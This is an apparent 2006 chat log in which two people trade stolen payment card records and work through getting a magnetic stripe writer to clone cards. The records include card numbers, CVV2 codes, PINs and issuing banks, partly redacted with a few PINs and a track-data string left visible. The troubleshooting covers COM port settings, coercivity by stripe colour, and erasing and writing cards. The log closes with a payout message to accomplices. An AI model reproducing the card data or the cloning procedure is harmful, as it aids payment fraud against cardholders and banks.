**denisektran (Tue Dec 12 10:42:37 2006):** Credit: 4782009████████EXP:████████CVV2:████PIN:████-- Credit: 432739████████EXP████████CVV2:████PIN:████--- Credit: 435643████████EXP:████CVV2:████PIN:████--- Credit: 4791242████████EXP:████CVV2:████PIN:████ no nick: Credit: 5142681████████EXP:████████CVV2:████PIN:████-- Credit: 545436████████EXP:████CVV2:████PIN:████--- Credit: 486830████████EXP:████████CVV2:████PIN:████

**denisektran (Tue Dec 12 10:43:43 2006):** Cardnumber: 4217475████████Expiry Date:████CVV2:████ATM Pin:████

**scur51 (Tue Dec 12 10:44:15 2006):** you missed the pin on one of them

**scur51 (Tue Dec 12 10:44:20 2006):** with a cvv of████

**denisektran (Tue Dec 12 10:44:40 2006):** 55141700████████Exp: ████ Cvv: ████Pin: ████ 55141700████████MASTERCARD MONEY ACCESS SERVICE, INC U.S.A. 800-622-1040 **************************** 4020170████████Exp:████Cvv:████Pin:████40201700████ 07/09 VISA CLASSIC (DEBIT) ADAMS COUNTY NATIONAL BANK U.S.A. 877-866-7827 *************************** 5410399████████Exp: ████ Cvv: ████Pin: 8725 541039████ 05/08 MASTERCARD SOUTH CAROLINA F.C.U. U.S.A. 727-572-8822 ***************************** name="ccnumber" value="423802████████' name="cvv" value="████ name="pin" value="████ name="month" value="████' name="year" value=████' 42380206████████████VISA CLASSIC (DEBIT) CU HAWAII F.C.U. U.S.A. 800-881-7488 **************

**denisektran (Tue Dec 12 10:44:55 2006):** is there

**denisektran (Tue Dec 12 10:45:12 2006):** ok.....these just do yymm████████████████

**scur51 (Tue Dec 12 10:45:24 2006):** no track 1?

**denisektran (Tue Dec 12 10:45:32 2006):** BXXXXXXXXXXXXXXXXXXX^^

**scur51 (Tue Dec 12 10:45:37 2006):** k

**scur51 (Tue Dec 12 10:45:43 2006):** where r ur cards at?

**denisektran (Tue Dec 12 10:45:50 2006):** start the bottom

**scur51 (Tue Dec 12 10:45:56 2006):** k

**denisektran (Tue Dec 12 10:46:17 2006):** cards i might not have

**denisektran (Tue Dec 12 10:46:19 2006):** there

**scur51 (Tue Dec 12 10:46:54 2006):** ur killin me

**scur51 (Tue Dec 12 10:52:34 2006):** did u do that

**scur51 (Tue Dec 12 10:52:43 2006):** ey.. i just talked to mom

**denisektran (Tue Dec 12 10:52:49 2006):** ?

**scur51 (Tue Dec 12 10:52:50 2006):** I am currently away from the computer.

**scur51 (Tue Dec 12 10:53:11 2006):** she said someone's been stealin stones

**scur51 (Tue Dec 12 10:53:24 2006):** she asked if you could check the camera video

**scur51 (Tue Dec 12 10:53:30 2006):** to see if you could see anything

**scur51 (Tue Dec 12 10:53:39 2006):** and if you could put up more cameras

**denisektran (Tue Dec 12 10:53:41 2006):** stones?shit it not to the back yard

**denisektran (Tue Dec 12 10:53:50 2006):** ok ..im goin there in lil

**scur51 (Tue Dec 12 10:53:51 2006):** right on the slabs

**scur51 (Tue Dec 12 10:53:53 2006):** no

**scur51 (Tue Dec 12 10:53:55 2006):** not in lb

**scur51 (Tue Dec 12 10:53:57 2006):** in sac

**denisektran (Tue Dec 12 10:54:08 2006):** the fukin old man

**denisektran (Tue Dec 12 10:54:19 2006):** and shit

**scur51 (Tue Dec 12 10:54:22 2006):** u think the old guy is doin it?

**denisektran (Tue Dec 12 10:54:27 2006):** yea



**denisektran (Tue Dec 12 10:54:31 2006):** him and curt
**scur51 (Tue Dec 12 10:54:36 2006):** check the camera footage
**denisektran (Tue Dec 12 10:54:45 2006):** and probally the monks
**scur51 (Tue Dec 12 10:54:55 2006):** haa
**denisektran (Tue Dec 12 10:55:02 2006):** next door
**scur51 (Tue Dec 12 10:55:31 2006):** well.. see if u could see anything on the cameras
**scur51 (Tue Dec 12 10:55:36 2006):** and put more up if you can
**scur51 (Tue Dec 12 10:55:43 2006):** whenever u head back up there
**denisektran (Tue Dec 12 10:55:46 2006):** k
**scur51 (Tue Dec 12 11:15:11 2006):** so u comin to lb still
**denisektran (Tue Dec 12 11:15:38 2006):** later
**denisektran (Tue Dec 12 11:15:41 2006):** few hrs
**scur51 (Tue Dec 12 11:15:48 2006):** i can't write the cards i have anyway
**scur51 (Tue Dec 12 11:16:01 2006):** i think there's some setting error on the msr
**denisektran (Tue Dec 12 11:16:43 2006):** using jerm?
**scur51 (Tue Dec 12 11:17:04 2006):** ya
**denisektran (Tue Dec 12 11:17:08 2006):** open 2-3 time
**scur51 (Tue Dec 12 11:17:10 2006):** i couldn't erase my card
**denisektran (Tue Dec 12 11:17:48 2006):** open jerm 2-3 times until its open correct
**scur51 (Tue Dec 12 11:18:06 2006):** what folder is program in
**denisektran (Tue Dec 12 11:18:16 2006):** not sure
**denisektran (Tue Dec 12 11:18:25 2006):** open 2-3 instances
**scur51 (Tue Dec 12 11:18:33 2006):** found it
**scur51 (Tue Dec 12 11:19:26 2006):** no response on com3
**scur51 (Tue Dec 12 11:19:30 2006):** gonna restart comp
**denisektran (Tue Dec 12 11:19:36 2006):** com1
**denisektran (Tue Dec 12 11:19:49 2006):** no
**scur51 (Tue Dec 12 11:19:51 2006):** k
**denisektran (Tue Dec 12 11:19:55 2006):** work?
**scur51 (Tue Dec 12 11:20:08 2006):** ya
**scur51 (Tue Dec 12 11:21:47 2006):** still ddoesnt work
**scur51 (Tue Dec 12 11:21:56 2006):** wont erase or write card
**scur51 (Tue Dec 12 11:22:06 2006):** do i have to select coercivity
**denisektran (Tue Dec 12 11:22:24 2006):** low hi
**denisektran (Tue Dec 12 11:22:28 2006):** depends
**denisektran (Tue Dec 12 11:22:39 2006):** black strip hi
**denisektran (Tue Dec 12 11:22:47 2006):** brown = low
**scur51 (Tue Dec 12 11:22:53 2006):** can't even erase my card
**scur51 (Tue Dec 12 11:23:12 2006):** even though when i try to erase
**scur51 (Tue Dec 12 11:23:19 2006):** it says tracks erased successfully
**denisektran (Tue Dec 12 11:23:31 2006):** how u knjo its not erase
**denisektran (Tue Dec 12 11:23:39 2006):** read it
**scur51 (Tue Dec 12 11:23:41 2006):** cuz i read it
**denisektran (Tue Dec 12 11:23:41 2006):** ?
**scur51 (Tue Dec 12 11:23:45 2006):** it's still there
**denisektran (Tue Dec 12 11:23:57 2006):** rest the msr
**scur51 (Tue Dec 12 11:24:16 2006):** it's says command sent to reset to initial state
**denisektran (Tue Dec 12 11:24:16 2006):** reset
**scur51 (Tue Dec 12 11:24:24 2006):** but no other message after that

**denisektran (Tue Dec 12 11:24:27 2006):** ok
**scur51 (Tue Dec 12 11:24:29 2006):** the lights dont blink at all
**denisektran (Tue Dec 12 11:24:31 2006):** erse
**scur51 (Tue Dec 12 11:24:46 2006):** nope
**scur51 (Tue Dec 12 11:24:52 2006):** i'm gonna restart comp
**denisektran (Tue Dec 12 11:25:01 2006):** try closeing jerm
**scur51 (Tue Dec 12 11:25:09 2006):** i did
**denisektran (Tue Dec 12 11:25:10 2006):** and open new jerm
**denisektran (Tue Dec 12 11:25:23 2006):** com1 is set?
**scur51 (Tue Dec 12 11:26:19 2006):** ya.. i open different jermm in different folder too
**scur51 (Tue Dec 12 11:26:27 2006):** still won't erase
**scur51 (Tue Dec 12 11:26:32 2006):** i just restart, ok?
**denisektran (Tue Dec 12 11:26:36 2006):** is all plugged in?
**denisektran (Tue Dec 12 11:26:41 2006):** ok restart
**scur51 (Tue Dec 12 11:44:46 2006):** got it workin
**scur51 (Tue Dec 12 11:45:13 2006):** u know where even a couple cards are in lb?
**denisektran (Tue Dec 12 11:45:30 2006):** no idea
**scur51 (Tue Dec 12 11:45:34 2006):** i only wrote the one on mine and the wash mut doesnt work
**scur51 (Tue Dec 12 11:45:36 2006):** k
**denisektran (Tue Dec 12 11:45:56 2006):** try in drawer
**scur51 (Tue Dec 12 11:47:04 2006):** found em
**denisektran (Tue Dec 12 11:53:50 2006):** 42662███████████=09071010██████████
**denisektran (Tue Dec 12 11:53:59 2006):** 5684
**scur51 (Tue Dec 12 11:59:10 2006):** u have any ish around here
**denisektran (Tue Dec 12 11:59:57 2006):** i think
**scur51 (Tue Dec 12 12:00:11 2006):** I am currently away from the computer.
**denisektran (Tue Dec 12 12:00:17 2006):** in cabinet or pensil holder on top comp
**scur51 (Tue Dec 12 12:00:43 2006):** k
**scur51 (Tue Dec 12 19:46:40 2006):** ey
**scur51 (Tue Dec 12 19:46:48 2006):** i dunno if u went to lb yet
**scur51 (Tue Dec 12 19:47:23 2006):** but to finish the note i left you of which ones i've tried.. the 9 i had were all no good
**denisektran (Tue Dec 12 22:52:01 2006):** all who i owe cash to message me now !!!!!!!
**denisektran (Tue Dec 12 22:57:32 2006):** in 20 minutes i will go to send ...so leave ur infos or i wont send ur share...thank you!!!!!!(mass)